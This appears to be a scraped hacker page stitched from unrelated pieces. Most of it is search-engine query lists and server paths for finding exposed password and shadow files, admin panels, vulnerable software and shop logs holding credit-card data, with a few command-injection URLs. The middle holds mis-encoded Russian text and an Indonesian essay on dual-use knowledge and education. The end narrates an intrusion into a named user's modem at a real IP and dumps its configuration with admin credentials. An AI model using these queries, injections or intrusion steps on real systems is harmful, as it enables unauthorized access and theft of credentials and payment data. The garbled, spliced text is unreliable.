allinurl: “proxylist.txt”
allinurl: “proxy.txt”
“index of/root”
“auth_user_file.txt”
“index of/root”
“Index of /admin”
“Index of /password”
“Index of /mail”
“Index of /” +passwd
“Index of /” +password.txt
“Index of /” +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto
administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index
allintitle: “index of/admin”
allintitle: “index of/root”
allintitle: sensitive filetype oc
allintitle: restricted filetype :mail
allintitle: restricted filetype oc site:gov
for IIS server exlpoit
allinurl: winnt/system32/
and u’ll get many IIS server exploitsú
intitle:r57shell
intitle:”Index of” .sh_history
intitle:”Index of” .bash_history
intitle:”index of” passwd
intitle:”index of” people.lst
intitle:”index of” pwd.db
intitle:”index of” etc/shadow
intitle:”index of” spwd
intitle:”index of” master.passwd
intitle:”index of” htpasswd
intitle:”index of” members OR accounts
intitle:”index of” user_carts OR user_cart
_vti_inf.html
service.pwd
users.pwd
authors.pwd
administrators.pwd
shtml.dll
shtml.exe
fpcount.exe
default.asp
showcode.asp
sendmail.cfm
getFile.cfm
imagemap.exe
test.bat
msadcs.dll
htimage.exe
counter.exe
browser.inc
hello.bat
default.asp\
dvwssr.dll
cart32.exe
add.exe
index.jsp
SessionServlet
glimpse
man.sh
AT-admin.cgi
AT-generate.cgi
inurl:/adpassword.txt
inurl:admin.dat
and even for shop sites:
inurl:/shop/db/
intitle:”index of/ shop” +db
intitle:”index of/” +shopping_cart
“Index of /admin”
“Index of /password”
“Index of /mail”
“Index of /” +passwd
“Index of /” +password.txt
“Index of /” +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto
administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index
allintitle: “index of/admin”
allintitle: “index of/root”
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov
inurlasswd filetype:txt
inurl:admin filetype:db
inurl:iisadmin
inurl:”auth_user_file.txt”
inurl:”wwwroot/*.”
top secret site:mil
confidential site:mil
allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history
intitle:”Index of” .sh_history
intitle:”Index of” .bash_history
intitle:”index of” passwd
intitle:”index of” people.lst
intitle:”index of” pwd.db
intitle:”index of” etc/shadow
intitle:”index of” spwd
intitle:”index of” master.passwd
intitle:”index of” htpasswd
intitle:”index of” members OR accounts
intitle:”index of” user_carts OR user_cart
Ìíîãèå àäìèíû îñòàâëÿþò îòêðûòûìè òàêèå äèðåêòîðèè:
Öèòàòà:/orders
/Order
/Orders
/order
/config
/Admin_files
/mall_log_files
/PDG_Cart
PDG_Cart/order.log
PDG_Cart/shopper.conf
/pw
/store/customers
/store/temp_customers
/WebShop
/webshop
/WebShop/templates
/WebShop/logs
/cgi/PDG_Cart/order.log
/PDG_Cart/authorizenets.txt
/cgi-bin/PDG_Cart/mc.txt
/PDG/order.txt
/cgi-bin/PDG_cart/card.txt
/PDG_Cart/shopper.conf
/php/mlog.phtml
/php/mylog.phtml
/webcart/carts
/cgi-bin/orders.txt
/WebShop/logs
/cgi-bin/AnyForm2
/cgi-bin/mc.txt
/ccbill/secure/ccbill.log
/cgi-bin/orders/mc.txt
/WebCart/orders.txt
/cgi-bin/orders/cc.txt
/cvv2.txt
/cgi-bin/orderlog.txt
/WebShop/logs
/orderb/shop.mdb
/_private/shopping_cart.mdb
/scripts/iisadmin/tools/mkilog.exe
/cool-logs/mylog.html
/cool-logs/mlog.html
/easylog/easylog.html
/HyperStat/stat_what.log
/mall_log_files/
/scripts/weblog
/super_stats/access_logs
/trafficlog
/wwwlog
/Admin_files/order.log
/bin/orders/orders.txt
/cgi/orders/orders.txt
/cgi-bin/orders/orders.txt
/cgi-sys/orders/orders.txt
/cgi-local/orders/orders.txt
/htbin/orders/orders.txt
/cgibin/orders/orders.txt
/cgis/orders/orders.txt
/scripts/orders/orders.txt
/cgi-win/orders/orders.txt
/bin/pagelog.cgi
/cgi/pagelog.cgi
/cgi-bin/pagelog.cgi
/cgi-sys/pagelog.cgi
/cgi-local/pagelog.cgi
/cgibin/pagelog.cgi
/cgis/pagelog.cgi
/scripts/pagelog.cgi
/cgi-win/pagelog.cgi
/bin/DCShop/auth_data/auth_user_file.txt
/cgi/DCShop/auth_data/auth_user_file.txt
/cgi-bin/DCShop/auth_data/auth_user_file.txt
/cgi-sys/DCShop/auth_data/auth_user_file.txt
/cgi-local/DCShop/auth_data/auth_user_file.txt
/htbin/DCShop/auth_data/auth_user_file.txt
/cgibin/DCShop/auth_data/auth_user_file.txt
/cgis/DCShop/auth_data/auth_user_file.txt
/scripts/DCShop/auth_data/auth_user_file.txt
/cgi-win/DCShop/auth_data/auth_user_file.txt
/bin/DCShop/orders/orders.txt
/cgi/DCShop/orders/orders.txt
/cgi-bin/DCShop/orders/orders.txt
/cgi-sys/DCShop/orders/orders.txt
/cgi-local/DCShop/orders/orders.txt
/htbin/DCShop/orders/orders.txt
/cgibin/DCShop/orders/orders.txt
/cgis/DCShop/orders/orders.txt
/scripts/DCShop/orders/orders.txt
/cgi-win/DCShop/orders/orders.txt
/dc/auth_data/auth_user_file.txt
/dcshop/orders/orders.txt
/dcshop/auth_data/auth_user_file.txt
/dc/orders/orders.txt
/orders/checks.txt
/orders/mountain.cfg
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/webcart/carts
/webcart-lite/orders/import.txt
/webcart/config
/webcart/config/clients.txt
/webcart/orders
/webcart/orders/import.txt
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/bin/shop/auth_data/auth_user_file.txt
/cgi/shop/auth_data/auth_user_file.txt
/cgi-bin/shop/auth_data/auth_user_file.txt
/cgi-sys/shop/auth_data/auth_user_file.txt
/cgi-local/shop/auth_data/auth_user_file.txt
/htbin/shop/auth_data/auth_user_file.txt
/cgibin/shop/auth_data/auth_user_file.txt
/cgis/shop/auth_data/auth_user_file.txt
/scripts/shop/auth_data/auth_user_file.txt
/cgi-win/shop/auth_data/auth_user_file.txt
/bin/shop/orders/orders.txt
/cgi/shop/orders/orders.txt
/cgi-bin/shop/orders/orders.txt
/cgi-sys/shop/orders/orders.txt
/cgi-local/shop/orders/orders.txt
/htbin/shop/orders/orders.txt
/cgibin/shop/orders/orders.txt
/cgis/shop/orders/orders.txt
/scripts/shop/orders/orders.txt
/cgi-win/shop/orders/orders.txt
/bin/shop.pl/page=;cat%20shop.pl
/cgi/shop.pl/page=;cat%20shop.pl
/cgi-bin/shop.pl/page=;cat%20shop.pl
/cgi-sys/shop.pl/page=;cat%20shop.pl
/cgi-local/shop.pl/page=;cat%20shop.pl
/htbin/shop.pl/page=;cat%20shop.pl
/cgibin/shop.pl/page=;cat%20shop.pl
/cgis/shop.pl/page=;cat%20shop.pl
/scripts/shop.pl/page=;cat%20shop.pl
/cgi-win/shop.pl/page=;cat%20shop.pl
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/cgis/cart.pl
/bin/cart.pl
/cgi/cart.pl
/cgi-bin/cart.pl
/cgi-sys/cart.pl
/cgi-local/cart.pl
/htbin/cart.pl
/cgibin/cart.pl
/cgis/cart.pl
/scripts/cart.pl
/cgi-win/cart.pl
/bin/cart32.exe
/cgi/cart32.exe
/cgi-bin/cart32.exe
/cgi-sys/cart32.exe
/cgi-local/cart32.exe
/htbin/cart32.exe
/cgibin/cart32.exe
/cgis/cart32.exe
/scripts/cart32.exe
/cgi-win/cart32.exe
/cgi-bin/www-sql;;;
/server%20logfile;;;
/cgi-bin/pdg_cart/order.log
/cgi-bin/shopper.exe?search
/orders/order.log
/orders/import.txt
/orders/checks.txt
/orders/orders.txt
/Orders/order.log
/order/order.log
/WebShop/logs/ck.log
/WebShop/logs/cc.txt
/WebShop/templates/cc.txt
/_private/orders.txt
â
ýòèõ äèðåêòîðèÿõ ìû çà ÷àñòóþ ìîæåì íàéòè òàêèå ôàéëû êàê
Öèòàòà:orders.txt
order.txt
import.txt
checks.txt
order_log
order.log
orders.log
orders_log
log_order
log_orders
temp_order
temp_orders
order_temp
robots.txt
admin.mdb
user_file.txt
comment:advisories and vulnerabilities*—–
“1999-2004 FuseTalk Inc” -site:fusetalk.com
“2003 DUware All Rights Reserved”
“Active Webcam Page” inurl:8080
“BlackBoard 1.5.1-f | © 2003-4 by Yves Goergen”
“BosDates Calendar System ” “powered by BosDates v3.2 by BosDev”
“Copyright © 2002 Agustin Dondo Scripts”
“delete entries” inurl:admin/delete.asp
“driven by: ASP Message Board”
“Enter ip” inurl:”php-ping.php”
“IceWarp Web Mail 5.3.0″ “Powered by IceWarp”
“Ideal BB Version: 0.1″ -idealbb.com
“inurl:/site/articles.asp?idcategory=”
“Obtenez votre forum Aztek” -site:forum-aztek.com
“Online Store - Powered by ProductCart”
“Powered *: newtelligence” (”dasBlog 1.6″| “dasBlog 1.5″| “dasBlog 1.4″|”dasBlog 1.3″)
“Powered by A-CART”
“Powered by AJ-Fork v.167″
“powered by antiboard”
“Powered by Coppermine Photo Gallery”
“Powered by CubeCart”
“Powered by DCP-Portal v5.5″
“Powered by DMXReady Site Chassis Manager” -site:dmxready.com
“Powered by FUDforum”
“Powered by Gallery v1.4.4″
“Powered by IceWarp Software” inurl:mail
“Powered by Ikonboard 3.1.1″
“Powered by Megabook *” inurl:guestbook.cgi
“Powered by MercuryBoard [v1"
"powered by minibb" -site:[??? ????????? ?????? ?????? ????? ??????????????????] -intext:1.7f
“Powered by My Blog” intext:”FuzzyMonkey.org”
“Powered by ocPortal” -demo -ocportal.com
“powered by phpWebSite” 0.9-3-2…4
“Powered by PowerPortal v1.3″
“powered by vbulletin 3.0″
“Powered by WordPress” -html filetype:php -demo -wordpress.org -bugtraq
“Powered by WowBB” -site:wowbb.com
“Powered by YaPig V0.92b”
“Powered by yappa-ng”
“running: Nucleus v3.1″ -.nucleuscms.org -demo
“SquirrelMail version 1.4.4″ inurl:src ext:php
“This page has been automatically generated by Plesk Server Administrator”
+”Powered by Invision Power Board v2.0.0..2″
+”Powered by phpBB 2.0.6..10″ -phpbb.com -phpbb.pl
inurl:”dispatch.php?atknodetyp e” | inurl:class.at —–Achievo webbased project management—–
allintitle:aspjar.com guestbook
inurl:”/becommunity/community/index.php?pageurl=” —–E-market remote code execution—–
inurl:custva.asp —–EarlyImpact Productcart—–
ext:php intext:”Powered by phpNewMan Version”
ext:pl inurl:cgi intitle:”FormMail *” -”*Referrer” -”* Denied” -sourceforge -error -cvs -input
filetype:cgi inurl:nbmember.cgi
filetype:cgi inurl:pdesk.cgi
filetype:cgi inurl:tseekdir.cgi
filetype:php inurl:index.php inurl:”module=subjects” inurl:”func=*” (listpages| viewpage | listcat)
intext”UBB.threads™ 6.2″|”UBB.threads™ 6.3″) intext:”You * not logged *” -site:ubbcentral.com
intitle:”EMUMAIL - Login” “Powered by EMU Webmail”
intitle:”MRTG/RRD” 1.1* (inurl:mrtg.cgi | inurl:14all.cgi |traffic.cgi)
intitle:”View Img” inurl:viewimg.php
intitle:”WebJeff - FileManager” intext:”login” intext:Pass|PAsse
intitle:”WordPress > * > Login form” inurl:”wp-login.php”
intitle:guestbook “advanced guestbook 2.2 powered”
intitle:welcome.to.horde
inurl:”/cgi-bin/loadpage.cgi?user_id=”
inurl:”/site/articles.asp?idcategory=”
inurl:”comment.php?serendipity “
inurl:”messageboard/Forum.asp?”
inurl:”slxweb.dll”
inurl:/SiteChassisManager/
inurl:cal_make.pl
inurl:citrix/metaframexp/default/login.asp? ClientDetection=On
inurl:comersus_message.asp
inurl:directorypro.cgi
inurl:gotoURL.asp?url=
inurl:technote inurl:main.cgi*filename=*
inurl:ttt-webmaster.php
inurl:wiki/MediaWiki
“Powered by Invision Power Board(U) v1.3 Final” —–Invision Power Board SSI.PHP SQL Injection—–
“Powered by mnoGoSearch - free web search engine software” —–nGoSearch vulnerability—–
“FC Bigfeet” -inurl:mail —–Quicksite demopages for Typo3—–
inurl:com_remository —–ReMOSitory module for Mambo—–
uploadpics.php?did= -forumintext:Generated.by.phpix .1.0? inurl:$mode=album
“Powered by: vBulletin * 3.0.1″ inurl:newreply.php —–vBulletin version 3.0.1 newreply.php XSS—–
filetype:asp inurl:”shopdisplayproducts.asp ” —–VP-ASP Shopping Cart XSS—–
inurl:/cgi-bin/index.cgi inurl:topics inurl:viewcat= +intext:”WebAPP” -site:web-app.org —–WebAPP directory traversal—–
“FrontPage-” inurl:service.pwd
” Dumping data for table”
“phpMyAdmin MySQL-Dump” filetype:txt
“1999-2004 FuseTalk Inc” -site:fusetalk.com
“4images Administration Control Panel”
“ASP.NET_SessionId” “data source=”
“Active Webcam Page” inurl:8080
“AnWeb/1.42h” intitle:index.of
“BlackBoard 1.5.1-f | © 2003-4 by Yves Goergen”
“CERN httpd 3.0B (VAX VMS)”
“Certificate Practice Statement” inurlPDF | DOC)
“Copyright (c) Tektronix, Inc.” “printer status”
“Enter ip” inurl:”php-ping.php”
“FC Bigfeet” -inurl:mail
“File Upload Manager v1.3″ “rename to”
“HTTP_FROM=googlebot” googlebot.com “Server_Software=”
“IMail Server Web Messaging” intitle:login
“Ideal BB Version: 0.1″ -idealbb.com
“Incorrect syntax near”
“Index of /backup”
“Index of” rar r01 nfo Modified 2004
“Internal Server Error” “server at”
“JRun Web Server” intitle:index.of
“Login to Usermin” inurl:20000
“MaXX/3.1″ intitle:index.of
“Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)” ext:log
“Microsoft-IIS/* server at” intitle:index.of
“Microsoft-IIS/5.0 server at”
“More Info about MetaCart Free”
“Netware * Home” inurl:nav.html
“Network Vulnerability Assessment Report”
“OPENSRS Domain Management” inurl:manage.cgi
“ORA-00933: SQL command not properly ended”
“ORA-12541: TNS:no listener” intitle:”error occurred”
“OmniHTTPd/2.10″ intitle:index.of
“OpenSA/1.0.4″ intitle:index.of
“Phaser 6250″ “Printer Neighborhood” “XEROX CORPORATION”
“Phaser® 740 Color Printer” “printer named: “
“Phorum Admin” “Database Connection” inurl:forum inurl:admin
“Powered *: newtelligence” (”dasBlog 1.6″| “dasBlog 1.5″| “dasBlog 1.4″|”dasBlog 1.3″)
“Powered by A-CART”
“Powered by Coppermine Photo Gallery”
“Powered by DCP-Portal v5.5″
“Powered by Duclassified” -site:duware.com
“Powered by Dudirectory” -site:duware.com
“Powered by Gallery v1.4.4″
“Powered by Ikonboard 3.1.1″
“Powered by Invision Power File Manager” (inurl:login.php) | (intitle:”Browsing directory /” )
“Powered by Link Department”
“Powered by MercuryBoard [v1"
"Powered by PHPFM" filetype:php -username
"Powered by WordPress" -html filetype:php -demo -wordpress.org -bugtraq
"Powered by YaPig V0.92b"
"Powered by ocPortal" -demo -ocportal.com
"Powered by yappa-ng"
"Red Hat Secure/2.0"
"Request Details" "Control Tree" "Server Variables"
"Select a database to view" intitle:"filemaker pro"
"SquirrelMail version 1.4.4" inurl:src ext:php
"Supplied argument is not a valid MySQL result resource"
"Switch to table format" inurl:table|plain
"SysCP - login"
"The script whose uid is " "is not allowed to access"
"This file was generated by Nessus"
"This page has been automatically generated by Plesk Server Administrator"
"This report was generated by WebLog"
"Unclosed quotation mark before the character string"
"VNC Desktop" inurl:5800
"Warning: Cannot modify header information - headers already sent"
"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL"
allinurl:/examples/jsp/snp/snoop.jsp
allinurl:index.htm?cus?audio
allinurl:install/install.php
allinurl:intranet admin
allinurl:servlet/SnoopServlet
axis storpoint "file view" inurl:/volumes/
buddylist.blt
camera linksys inurl:main.cgi
comment:Files containing juicy info***]
comment:Files containing usernames
comment:Pages containing login portals
comment:Sensitive Directories***]
comment:Various online devices
comment:Vulnerable servers
comment:advisories and vulnerabilities
data filetype:mdb -site:gov -site:mil
databasetype. Code : 80004005. Error Description
e-mail address filetype:csv csv
eggdrop filetype:user user
etc (index.of)
ext:asp inurlUgallery intitle:”3.0″ -site:dugallery.com -site:duware.com
ext:asp inurl:pathto.asp
ext:cgi intext:”nrg-” ” This web page was created on “
ext:cgi inurl:editcgi.cgi inurl:file=
ext:cgi inurl:ubb6_test.cgi
ext:conf inurl:rsyncd.conf -cvs -man
ext:gho gho
ext:ini eudora.ini
ext:ini intext:env.ini
ext:ldif ldif
ext:log “Software: Microsoft Internet Information Services *.*”
ext:mdb inurl:*.mdb inurl:fpdb shop.mdb
ext:nsf nsf -gov -mil
ext:php intext:”Powered by phpNewMan Version”
ext:pl inurl:cgi intitle:”FormMail *” -”*Referrer” -”* Denied” -sourceforge -error -cvs -input
ext:reg “username=*” putty
ext:txt inurl:dxdiag
ext:vmx vmx
ezBOO “Administrator Panel” -cvs
filetype:QDF QDF
filetype:asp “Custom Error Message” Category Source
filetype:asp DBQ=” * Server.MapPath(”*.mdb”)
Ketika dewa Yunani resah dengan terbukanya kotak Pandora oleh anak manusia maka semenjak saat itupula bumi yang selama ini dihuni dalam keadaan aman, sejahtera, (bahasa ORBAnya Toto Tentrem Gemah Ripah Loh Jenawi) menjadi diluar kontrol Dewa-Dewa. Sebab dengan Kotak Pandora itu maka manusia mempunyai kemampuan yang sama dengan Dewa.
Tafsir kisah tersebut diatas adalah kotak Pandora tersebut adalah Ilmu Pengetahuan. Maka semenjak itu dengan pengetahuannya manusia mulai mendekati sifat “ketuhanan” (saya pikir itu justru fitrahwi buat manusia untuk menuju kesempurnaan)
Maka manusia mulai menemukan Api, pisau, yang kita juga sama-sama tahu bahwa api dan pisau bisa membawa binasa buat kita. Namun pada sisi lain juga bisa membantu pekerjaan kita sehari-hari (bahasanya klasik banget!! ;) dalam kasus yang lebih sophisticated adalah ketika nuklir ditemukan. pada sisi lain dia menjadi bencana bagi umat manusia ketika penggunaannya pada kasus Bom Atom Hiroshima dan Nagasaki (dan kita justru dengan bangganya menceritakan hal tersebut dalam buku sejarah bangsa, padahal apa bedanya kita dengan Jepang dan Belanda). Namun ketika digunakan untuk Pembangkit Listrik Tenaga Nuklir, ia merupakan potensi yang tak ada habisnya (dengan tabrakan atomnya yang makin controllable).
saya pikir blog itu juga bebas nilai, sama seperti ketika perdebatan tentang apakah nuklir itu bermanfaat atau tidak?
Jadi Blog bisa merupakan tempat penyaluran bakat (entah itu bakat nulis yang baik dan benar sesuai EYD, ;P atokah tempat penyaluran yang baik juga untuk bakat-bakat menipu.
Jadi persoalannya bukan pada apinya, bukan pada pisaunya, bukan pada Nuklirnya , bukan pada Blognya, namun pada sisi penggunanya.
Tinggal bagaimana prilaku penggunanya. apakah mentalnya memang penjahat atau sufi.
Jadi yang paling penting sekarang adalah bagaimana Pendidikan itu mampu membuat manusia Indonesia tidak bermental Penjahat.
“Tapi bagaimana mungkin, membaca saja aku sulit…..” (suaranya seperti iklan layanan masyarakat yang pernah ditayangkan di TVRI)
Tapi bagaimana mungkin menghasilkan manusia yang bermental sufi ketika pendidikan yang kita jalani penuh dengan kebobrokan… gaji guru disunat (alhamdulillah sekarang agak mendingan) Dana gedung sekolah di Korupsi (dengar-dengar Depdiknas merupakan departemen terkorup kedua di Indonesia. Yang lebih celaka ternyata Depag urutan pertamanya). Belum lagi bicara sistem pendidikan kita yang carut marut.
Jerih payah murid sekolah selama 3 tahun ditentukan dengan ujian “sialan” dalam 3 hari. Apalah guna dari Integral, matriks, Aljabar Boole, ketika kecerdasan yang dimiliki murid tertentu adalah dalam bidang musik !!!
Belum lagi standar kelulusan yang dipasang begitu tinggi, tanpa disertai perbaikan infrastruktur, dan suprastruktur pendukung pendidkan. Saya setuju dengan standar kelulusan yang tinggi, Kalau perlu anak SMA ujian TOEFL dengan standar kelulusan 400. Namun apakah sekarang saatnya? Ketimpangan infrastruktur pendidikan Jawa Sumatra dengan Sulampapua. ketimpangan desa dan kota????
entah…….
memang begitu pelik dan carut marut permasalahan yang harus dihadapi oleh bangsa Indonesia kita.
PUSING…..!!!!!
ada ide yang lebih baik????
Dan jangan lupa lagi bahwa setiap ID itu berdasarkan Line tlp setau saya seh begitu jadi kalau kita hack usernya sama aja jadi selusinya gimana Ya kita bobol server nya ihhiihihihih…
co_exmud is User10@125.164.72.124 * Ashof Yusiko
co_exmud on #surabaya #Malang
Saya akan mencoba masuk ke server dia karena saya lihat dari ident nya dia User10 berarti tidak jauh dia main di warnet dia user hehehe Allnet kan orangnya begitu tau dikit udah maju …. hi hi hi hi
setau saya semuanya user speedy memakai Modem kalau enngak salah ya, Jadi dia mempunyai web basic untuk meremote atau mensetnya..
http://125.164.72.124/ <<>
Dam…. masuk kita ke modem mereka dah sekarang kita mau mendapatkan password dan Login nya kita dump ..
create user name admin passwd password root
size maxvc 8 max1483vc 8 maxppe 8 maxl2tptunnel 1 maxl2tpsesspertunnel 1 maxl2tppeerrws 4
modify system contact “Conexant Inc.,100 Schulz Drive, Red Bank,NJ 07701,U.S.A” model “H90″ location “Conexant Inc.,100 Schulz Drive, Red Bank,NJ 07701,U.S.A” vendor “Conexant Inc.,100 Schulz Drive, Red Bank,NJ 07701,U.S.A” logthresh 1 systime “Jan 01 01:01:08 1970″ timezone “GMT” magicnum 125
modify bridge mode enable
create pfraw rule entry ruleid 15 ifname private dir in act deny
create pfraw rule entry ruleid 16 ifname private act deny
create pfraw rule entry ruleid 17 ifname private dir in act deny
create pfraw rule entry ruleid 18 ifname private act deny
create pfraw rule entry ruleid 19 ifname private dir in act deny
create pfraw rule entry ruleid ifname private act deny
create pfraw rule entry ruleid 21 ifname private dir in act deny
create pfraw rule entry ruleid 22 ifname private act deny
create pfraw rule entry ruleid 23 ifname private dir in act deny
create pfraw rule entry ruleid 24 ifname private act deny
create pfraw rule entry ruleid 25 ifname private dir in act deny
create pfraw rule entry ruleid 26 ifname private act deny
create pfraw rule entry ruleid 27 ifname private dir in act deny
create pfraw rule entry ruleid 28 ifname private act deny
create pfraw rule entry ruleid 29 ifname private dir in act deny
create pfraw rule entry ruleid 30 ifname private act deny
create pfraw rule entry ruleid 31 ifname private dir in act deny
create pfraw rule entry ruleid 32 ifname private act deny
create pfraw rule entry ruleid 33 ifname private dir in act deny
create pfraw rule entry ruleid 34 ifname private act deny
create pfraw rule entry ruleid 35 ifname private dir in act callmgmt
create pfraw rule entry ruleid 36 ifname dmz dir in act callmgmt
create pfraw rule entry ruleid 37 dir in act callmgmt
create pfraw subrule entry ruleid 15 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8863 0×8864
create pfraw subrule entry ruleid 16 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8863 0×8864
create pfraw subrule entry ruleid 17 subruleid 1 mask 0xFFFFFFFF start iph offset 16 enable cmpt range 0xE0000000 0xEFFFFFFF
create pfraw subrule entry ruleid 18 subruleid 1 mask 0xFFFFFFFF start iph offset 16 enable cmpt range 0xE0000000 0xEFFFFFFF
create pfraw subrule entry ruleid 19 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×8035
create pfraw subrule entry ruleid subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×8035
create pfraw subrule entry ruleid 21 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×809B
create pfraw subrule entry ruleid 22 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×809B
create pfraw subrule entry ruleid 23 subruleid 1 mask 0xFFFF offset 12 enable cmpt lteq 0×05DC
create pfraw subrule entry ruleid 23 subruleid 2 mask 0xFFFF offset 14 enable cmpt eq 0xF0F0
create pfraw subrule entry ruleid 24 subruleid 1 mask 0xFFFF offset 12 enable cmpt lteq 0×05DC
create pfraw subrule entry ruleid 24 subruleid 2 mask 0xFFFF offset 14 enable cmpt eq 0xF0F0
create pfraw subrule entry ruleid 25 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8137 0×8138
create pfraw subrule entry ruleid 26 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8137 0×8138
create pfraw subrule entry ruleid 27 subruleid 1 mask 0xFFFFFFFFFFFF offset 0 enable cmpt eq 0×0180C00000
create pfraw subrule entry ruleid 28 subruleid 1 mask 0xFFFFFFFFFFFF offset 0 enable cmpt eq 0×0180C00000
create pfraw subrule entry ruleid 29 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×0806
create pfraw subrule entry ruleid 30 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×0806
create pfraw subrule entry ruleid 31 subruleid 1 mask 0xFFFF offset 0 enable cmpt eq 0×3333
create pfraw subrule entry ruleid 32 subruleid 1 mask 0xFFFF offset 0 enable cmpt eq 0×3333
create pfraw subrule entry ruleid 33 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×8100
create pfraw subrule entry ruleid 34 subruleid 1 mask 0xFFFF offset 12 enable cmpt eq 0×8100
create pfraw subrule entry ruleid 35 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8863 0×8864
create pfraw subrule entry ruleid 36 subruleid 1 mask 0xFFFF offset 12 enable cmpt range 0×8863 0×8864
create pfraw subrule entry ruleid 37 subruleid 1 mask 0xFF offset 15 enable cmpt eq 0xA7
create ipf rule entry ruleid 1002 dir in act accept destaddr eq 255.255.255.255 transprot eq num 17 destport eq num 67 seclevel high
create ipf rule entry ruleid 1010 dir in destaddr bcast seclevel high
create ipf rule entry ruleid 10 dir in destaddr eq 255.255.255.255 seclevel high
create ipf rule entry ruleid 1030 ifname private dir in act accept storestate enable seclevel high medium low
create ipf rule entry ruleid 1040 ifname private dir out act accept srcaddr self storestate enable seclevel high medium low
create ipf rule entry ruleid 1050 ifname private dir out act accept transprot eq num 17 destport eq num 53 inifname dmz storestate enable seclevel high medium low
create ipf rule entry ruleid 1060 ifname private dir out act accept transprot eq num 6 destport eq num 53 inifname dmz storestate enable seclevel high medium low
create ipf rule entry ruleid 1070 ifname private dir out act accept transprot eq num 6 destport eq num 25 inifname dmz storestate enable seclevel high medium low
create ipf rule entry ruleid 1080 ifname private dir out act accept transprot eq num 6 destport eq num 110 inifname dmz storestate enable seclevel high medium low
create ipf rule entry ruleid 1090 ifname private dir out act accept transprot eq num 6 destport eq num 21 inifname dmz storestate enable seclevel medium low
create ipf rule entry ruleid 1100 ifname private dir out act accept transprot eq num 6 destport eq num 80 inifname dmz storestate enable seclevel medium low
create ipf rule entry ruleid 1110 ifname private dir out act accept transprot eq num 6 destport eq num 23 inifname dmz storestate enable
create ipf rule entry ruleid 11 ifname private dir out act accept transprot eq num 1 inifname dmz storestate enable
create ipf rule entry ruleid 1130 ifname dmz dir out transprot eq num 6 destport eq num 23 inifname private seclevel high
create ipf rule entry ruleid 1140 ifname dmz dir out transprot eq num 17 destport eq num 53 inifname public seclevel high
create ipf rule entry ruleid 1150 ifname dmz dir out transprot eq num 6 destport eq num 53 inifname public seclevel high
create ipf rule entry ruleid 1160 ifname dmz dir out transprot eq num 6 destport eq num 21 inifname public seclevel high
create ipf rule entry ruleid 1170 ifname dmz dir out transprot eq num 6 destport eq num 23 inifname public seclevel high medium low
create ipf rule entry ruleid 1180 ifname dmz dir out transprot eq num 1 inifname public seclevel high medium
create ipf rule entry ruleid 1190 ifname public dir out transprot eq num 6 destport eq num 23 seclevel high
create ipf rule entry ruleid 10 ifname public dir out act accept srcaddr self storestate enable seclevel high medium low
create ipf rule entry ruleid 1210 ifname public dir in destaddr bcast seclevel medium
create ipf rule entry ruleid 12 ifname public dir in destaddr eq 255.255.255.255 seclevel medium
create ipf rule entry ruleid 1230 ifname public dir in transprot eq num 17 destport eq num 7 seclevel high medium
create ipf rule entry ruleid 1240 ifname public dir in transprot eq num 17 destport eq num 9 seclevel high medium
create ipf rule entry ruleid 1250 ifname public dir in transprot eq num 17 destport eq num 19 seclevel high medium
create ipf rule entry ruleid 1260 ifname public dir in destaddr self transprot eq num 6 destport eq num 80 seclevel high medium low
create ipf rule entry ruleid 1270 ifname public dir in destaddr self transprot eq num 17 destport eq num 53 seclevel high
create ipf rule entry ruleid 1280 ifname public dir in destaddr self transprot eq num 6 destport eq num 53 seclevel high
create ipf rule entry ruleid 1290 ifname public dir in destaddr self transprot eq num 6 destport eq num 21 seclevel high medium low
create ipf rule entry ruleid 1300 ifname public dir in destaddr self transprot eq num 6 destport eq num 23 seclevel high medium low
create ipf rule entry ruleid 1310 ifname public dir in destaddr self transprot eq num 1 seclevel high medium
create ipf rule entry ruleid 13 ifname public dir in act accept destaddr self transprot eq num 17 destport eq num 53 storestate enable seclevel medium low
create ipf rule entry ruleid 1330 ifname public dir in act accept destaddr self transprot eq num 6 destport eq num 53 storestate enable seclevel medium low
create ipf rule entry ruleid 1340 ifname public dir in seclevel high isipopt yes
create ipf rule entry ruleid 1350 ifname public dir in seclevel high isfrag yes
create ipf rule entry ruleid 1360 ifname dmz dir in destaddr self transprot eq num 6 destport eq num 80 seclevel high medium
create ipf rule entry ruleid 1370 ifname dmz dir in destaddr self transprot eq num 6 destport eq num 21 seclevel high medium
create ipf rule entry ruleid 1380 ifname dmz dir in destaddr self transprot eq num 6 destport eq num 23 seclevel high medium
create ipf rule entry ruleid 1390 ifname dmz dir in act accept storestate enable seclevel high medium low
modify ipf global pubdefact accept pvtdefact deny dmzdefact accept
modify dhcp server cfg enable
create dhcp server pool start-ip 192.168.1.3 poolid 0 end-ip 192.168.1.34 mask 255.255.255.0
modify snmp trap disable
create rip intf ifname ppp-0
create ethernet intf ifname eth-0 ip 192.168.1.1 mask 255.255.255.0
create usb intf ifname usb-0 ip 192.168.1.2 mask 255.255.255.0
modify ip cfg ttl 64
